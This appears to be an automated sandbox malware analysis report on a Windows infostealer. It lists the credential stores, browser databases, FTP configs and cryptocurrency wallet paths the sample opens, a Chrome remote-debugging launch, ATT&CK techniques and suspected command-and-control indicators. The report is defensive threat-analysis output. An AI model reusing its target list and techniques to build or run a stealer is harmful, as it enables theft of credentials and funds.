                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004108B0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004108B0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00410990 HeapAlloc,GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00410990
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match File source: pjthjsdjgjrtavv.exe, type: SAMPLE
                  Source: Yara match File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match File source: 0.2.pjthjsdjgjrtavv.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.0.pjthjsdjgjrtavv.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960, type: MEMORYSTR
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Electrum\wallets\
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Ethereum\
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: keystore
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match File source: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960, type: MEMORYSTR

                  Remote Access Functionality

Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match File source: pjthjsdjgjrtavv.exe, type: SAMPLE
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.pjthjsdjgjrtavv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.pjthjsdjgjrtavv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Native API | 1 Create Account | 111 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | 1 Credentials in Registry | 11 Query Registry | Remote Desktop Protocol | 4 Data from Local System | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 12 Process Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 4 File and Directory Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 35 System Information Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1578710, Sample: pjthjsdjgjrtavv.exe, Startdate: 20/12/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label
pjthjsdjgjrtavv.exe | 49% | Virustotal |
pjthjsdjgjrtavv.exe | 58% | ReversingLabs | Win32.Trojan.Generic
pjthjsdjgjrtavv.exe | 100% | Joe Sandbox ML |
                  No Antivirus matches
                                                                                                                    high
                                                                                                                    https://outlook.office.com/mail/compose?isExtension=trued3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                      high
                                                                                                                      https://unitedstates4.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drfalse
                                                                                                                        high
                                                                                                                        https://i.y.qq.com/n2/m/index.htmld3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                          high
                                                                                                                          https://www.deezer.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                            high
                                                                                                                            https://web.telegram.org/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                              high
                                                                                                                              https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.15.dr, service_worker_bin_prod.js.15.drfalse
                                                                                                                                high
                                                                                                                                https://drive-daily-2.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                  high
                                                                                                                                  https://drive-daily-4.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                    high
                                                                                                                                    https://vibe.naver.com/todayd3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                      high
                                                                                                                                      https://srtb.msn.com/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                        high
                                                                                                                                        https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drfalse
                                                                                                                                          high
                                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drfalse
                                                                                                                                            high
                                                                                                                                            https://t.me/k04aelm0nk3Mozilla/5.0pjthjsdjgjrtavv.exefalse
                                                                                                                                              high
                                                                                                                                              https://assets.msn.com484a6b6e-c4f6-46bd-8440-eb0f5301b662.tmp.16.dr, 9e0507af-53af-4fdd-9eb3-e9b80c92e238.tmp.16.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.ecosia.org/newtab/pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, YM7G4E.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://drive-daily-1.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://excel.new?from=EdgeM365Shorelined3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brpjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://drive-daily-5.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.16.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.google.com/chromecontent.js.15.dr, content_new.js.15.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.tiktok.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.msn.com/web-notification-icon-light.png2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0pjthjsdjgjrtavv.exefalse
                                                                                                                                                                    high
                                                                                                                                                                    https://chromewebstore.google.com/manifest.json.15.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgpjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1966618545.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, BA168G.0.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://drive-preprod.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://srtb.msn.cn/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://chrome.google.com/webstore/manifest.json.15.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://y.music.163.com/m/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://unitedstates2.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://bard.google.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://frostman.shop;pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://frostman.shopZMYMpjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://browser.events.data.msn.com/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://t.me/pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://web.whatsapp.comd3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://t.me/8pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://web.telegram.orgpjthjsdjgjrtavv.exe, 00000000.00000003.1269724485.00000000009EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://m.kugou.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://www.office.comd3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://outlook.live.com/mail/0/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://ntp.msn.com/edge/ntp000003.log0.15.dr, 2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://assets.msn.com/resolver/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://powerpoint.new?from=EdgeM365Shorelined3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://frostman.shop/~pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1296559926.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://tidal.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://ntp.msn.com000003.log6.15.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://browser.events.data.msn.cn/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://gaana.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://drive-staging.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://outlook.live.com/mail/compose?isExtension=trued3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=trued3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://support.mozilla.org/products/firefoxgro.allpjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmpfalse
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                                      192.168.2.7
                                                                                                                                                                                                                                                      127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578710
Start date and time: 2024-12-20 07:30:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: pjthjsdjgjrtavv.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@68/283@24/17
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
